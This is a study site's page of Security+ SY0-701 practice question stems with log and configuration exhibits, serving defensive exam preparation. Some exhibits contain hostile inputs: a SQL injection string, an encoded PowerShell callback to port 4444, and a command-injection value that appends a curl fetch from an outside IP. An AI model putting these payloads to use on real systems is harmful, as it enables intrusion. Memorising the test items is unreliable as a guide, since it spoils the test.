CompTIA exam questions

Security+ SY0-701 practice test

Practise questions on cloud computing concepts covering service models, deployment types, and essential characteristics for the SY0-701 exam.

1,152 practice questions · 5 topics covered · Exam code: SY0-701 · Vendor: CompTIA

Study modes

Three ways to study

Start with the Study Sheet to learn the material, switch to Practice Tests for active recall, then take a Mock Exam to simulate the real thing.

Study Sheet

All 1,152 questions with correct answers and explanations already visible. Read at your own pace — no time pressure.

Practice Test

Answer first, then see feedback and explanation. Tracks your score per session. Best for active recall and identifying weak areas.

Mock Exam

Full timed simulation with countdown. Answers hidden until the end. Includes all question types just like the real exam.

Study Sheet

All 1,152 SY0-701 questions with answers

Every question in the bank, paginated 75 per page. Correct answers and full explanations are revealed upfront — ideal for first-pass learning and pre-exam review.

16 pages · 75 questions per page · 1,152 total

Domain practice

Study SY0-701 by domain

Each domain has its own study sheet and practice test. Target the areas where you're weakest instead of repeating questions you already know.

Related practice questions

Study SY0-701 by topic

Topic pages go deep on individual concepts — each one covers a specific exam topic with questions, explanations, and study notes.

Courseiva uses original exam-style practice questions created for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps.

Sample questions

Security+ SY0-701 practice questions

An HR analyst must send a salary file to an external auditor. The auditor only needs names, departments, and salary totals, not Social Security numbers or bank account details. Which two actions should the analyst take first? Select two.

An investigator receives a suspect laptop drive that may be used in court. Which approach best supports a forensically sound image while protecting the original media?

An investigator must collect data from a suspected insider-threat laptop so the evidence could be used in an HR and legal review. Which action best preserves admissibility?

Question 4 · medium · multiple choice

An NDR tool shows a production web server sending small, periodic DNS queries to random-looking subdomains under a domain the company does not use. The pattern repeats every 60 seconds, even when normal web traffic is idle. What is the best interpretation and next step?

An investigator needs to make a forensic image of a suspect laptop without changing the original drive contents. Which two practices should be used? Select two.

An operations team manages Linux servers over SSH. The security team wants to stop direct management access from employee laptops, reduce lateral movement if one admin endpoint is compromised, and keep a log of every administrative session. Which two design choices best fit? Select two.

An investigator needs a copy of a suspect laptop drive for analysis without changing the original media. What should be used?

Question 8 · medium · multiple choice

An organization is redesigning its office network. Guest Wi-Fi must reach the internet only, employee laptops need access to internal apps, and a payment-processing system must be separated from general user traffic but still reach one database server. Which design best meets these requirements?

An online retailer is redesigning its public web application so the web server can receive internet traffic, the application server can only be reached by the web tier, and the database server can only be reached by the application tier. Which placement best supports this design?

An order-entry application must survive a single server failure and continue serving users if the primary site becomes unavailable. Management wants automatic failover, but does not want to pay for fully active production capacity in two regions. Which design is best?

Based on the exhibit, what is the best handling decision for the requested file?

Exhibit

Data request:
File: customer_export.csv
Contents: full name, street address, SSN last 4, account balance, support notes
Requestor: external troubleshooting contractor

Policy excerpt:
- Internal: company staff only
- Confidential: encrypt in transit, approved recipients only
- Restricted: minimize, mask where possible, owner approval required, time-limited access, logged sharing
- Public: may be shared externally without restriction

An organization is evaluating a payroll SaaS provider after the procurement team asks for evidence that the vendor's security controls were designed and operating effectively during the past year. Which document should the security team review first?

Question 13 · hard · multiple choice

Based on the exhibit, what additional control is the best fit?

Exhibit

Current controls on the finance share:
- SMB signing enabled
- Weekly access review
- Nightly backups to immutable storage
- Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive.
Goal: detect unauthorized bulk access quickly before exfiltration completes.

Based on the exhibit, what is the best next control to prevent noncompliant mobile devices from accessing corporate email while still allowing IT to wipe company data from lost phones?

Exhibit

MDM dashboard excerpt:
- iOS device compliance: 84%
- Android device compliance: 79%
- Email app access policy: Allow if credentials are valid
- Noncompliance reasons: outdated OS, no passcode, jailbreak/root indicators
- Lost device action: Full factory reset only

Security request:
Block risky devices from email access and protect employee personal data on BYOD devices.

Based on the exhibit, what is the best response to the facilities manager's request?

Exhibit

Corporate privacy notice excerpt:
- Employee home addresses, personal phone numbers, and emergency contacts are collected for payroll, benefits, tax reporting, and emergency notification only.
- Access is limited to HR and Payroll unless a privacy review approves another purpose.

Ticket:
- Facilities manager requests an export of all employee home addresses and personal phone numbers to mail holiday gifts and parking passes.

Question 16 · easy · multiple choice

Before applying a major patch to a virtual machine, the administrator wants a quick way to return the VM to its exact pre-change state if the patch fails. What should the administrator create?

Based on the exhibit, what is the best immediate action for the SOC or IR team?

A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

Exhibit

Host: finance-lap07
10:22:11  winword.exe spawned powershell.exe -enc <redacted>
10:22:14  powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02  file rename activity: 184 files changed to *.locked
10:24:09  outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01  EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'

Based on the exhibit, what type of web attack is most likely taking place?

Exhibit

Web application log excerpt:

Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1
Response: 500 Internal Server Error
Database log: syntax error near "OR" at line 1
Developer note: the search feature appends user input directly into the SQL query string without parameterization.

During a disaster recovery test, what is the most important thing to confirm about the backup?

Question 20 · easy · multiple choice

Based on the exhibit, what wireless threat is most likely occurring?

Exhibit

Wireless scan from the lobby:
SSID: CorpWiFi       BSSID: 18:AA:10:22:44:60  Signal: -78 dBm
SSID: CorpWiFi       BSSID: 7C:22:90:11:33:AA  Signal: -41 dBm
SSID: CorpGuest      BSSID: 18:AA:10:22:44:61  Signal: -79 dBm
User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."

Based on the exhibit, which integration best lets the SaaS application trust the company's existing identity provider so users can sign in with their corporate credentials?

Exhibit

SaaS sign-in settings:
- Local accounts: Enabled
- SAML SSO: Disabled
- SCIM provisioning: Disabled
- Password synchronization: Disabled
Requirement: users from the acquired subsidiary must use their existing corporate identities without separate SaaS passwords.

Based on the exhibit, what should the analyst do next to limit the impact of the suspected compromise?

Exhibit

EDR Alert Summary
Host: FIN-LT-22
Severity: High
Detection: Suspicious PowerShell with encoded command
Parent Process: winword.exe
Network Activity: outbound connection to 203.0.113.77:4444
User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'

Based on the exhibit, which change would most improve the security of the stored password data?

Exhibit

Database sample

users.password_hash
--------------------------------
alex   5f4dcc3b5aa765d61d8327deb882cf99
mira   202cb962ac59075b964b07152d234b70
sam    098f6bcd4621d373cade4e832627b4f6

Developer note:
- Passwords are hashed before storage
- The application does not currently store any salt values

Based on the exhibit, what is the BEST remediation for the application flaw shown?

A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

Exhibit

Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55

Exam question guide

How to use these SY0-701 questions

Use these questions as active recall, not passive reading. Try the question first, review the answer choices, then open the explanation and connect the result back to the exam topic.

Quick answer

Tests understanding of cloud service models, deployment types, and characteristics like scalability and elasticity.

- IaaS, PaaS, SaaS service model definitions and use cases
- Public, private, hybrid cloud deployment distinctions
- Key cloud characteristics: on-demand, broad network access
- Metered usage and resource pooling concepts

These SY0-701 practice questions are part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style SY0-701 questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.